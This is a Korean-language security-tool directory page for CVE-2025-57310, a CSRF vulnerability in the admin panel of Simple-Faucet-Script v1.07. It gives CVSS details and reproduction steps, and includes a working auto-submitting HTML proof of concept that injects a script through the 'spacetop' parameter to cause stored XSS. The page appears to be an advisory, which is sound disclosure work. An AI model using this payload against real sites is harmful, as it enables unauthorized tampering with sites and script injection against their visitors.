Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-57310 — Salmen2/Simple-Faucet-Script v1.07의 교차 사이트 요청 위조(CSRF) 취약점으로, admin.php?p=ads&c=1에 대한 조작된 POST 요청을 통해 공격자가 임의 코드를 실행할 수 있습니다. | Kitploit
도구/GitHubGitHub/mmakingdom/cve-2025-57310
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubmmakingdom/cve-2025-57310

CVE-2025-57310

Salmen2/Simple-Faucet-Script v1.07의 교차 사이트 요청 위조(CSRF) 취약점으로, admin.php?p=ads&c=1에 대한 조작된 POST 요청을 통해 공격자가 임의 코드를 실행할 수 있습니다.

저장소 보기
9개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-57310

Salmen2/Simple-Faucet-Script v1.07에서 admin.php?p=ads&c=1로 전송되는 조작된 POST 요청을 통해 발생하는 사이트 간 요청 위조(CSRF) 취약점으로, 공격자가 임의의 코드를 실행할 수 있습니다.

CWE

CWE-352: 사이트 간 요청 위조 (CSRF)

CVSS v3.1 기본 점수: 8.8 (높음)

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

요약

이 제품은 관리자 패널에서 사이트 간 요청 위조(CSRF)에 취약합니다. 인증된 관리자가 PoC가 포함된 악성 페이지를 방문하면 CSRF 공격으로 인해 홈페이지 콘텐츠가 무단으로 수정됩니다.

재현 단계

  1. https://example.com/admin.php에서 관리자로 로그인합니다.
  2. 다음 PoC를 열면 홈페이지에서 alert 팝업이 표시됩니다(저장형 XSS).
root@kitploit:~
<!DOCTYPE html>
  <html>
  <head>
      <title>CSRF PoC</title>
  </head>
  <body>
      <h3>Standard CSRF PoC</h3>
      <form action="https://example.com/admin.php?p=ads&c=1" method="post">
        <input type="hidden" name="spacetop" value="<script>alert();</script>" />
          <input type="submit" value="Submit request" />
      </form>
      <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
      </script>
  </body>
  </html>

영향

공격자는 spacetop 매개변수를 통해 홈페이지에 임의의 HTML/JavaScript를 주입할 수 있으며, 이로 인해 저장형 사이트 간 스크립팅(XSS)이 발생합니다.

크레딧

Muntadhar M. Ahmed (almuntadhar0x01)

도구 다운로드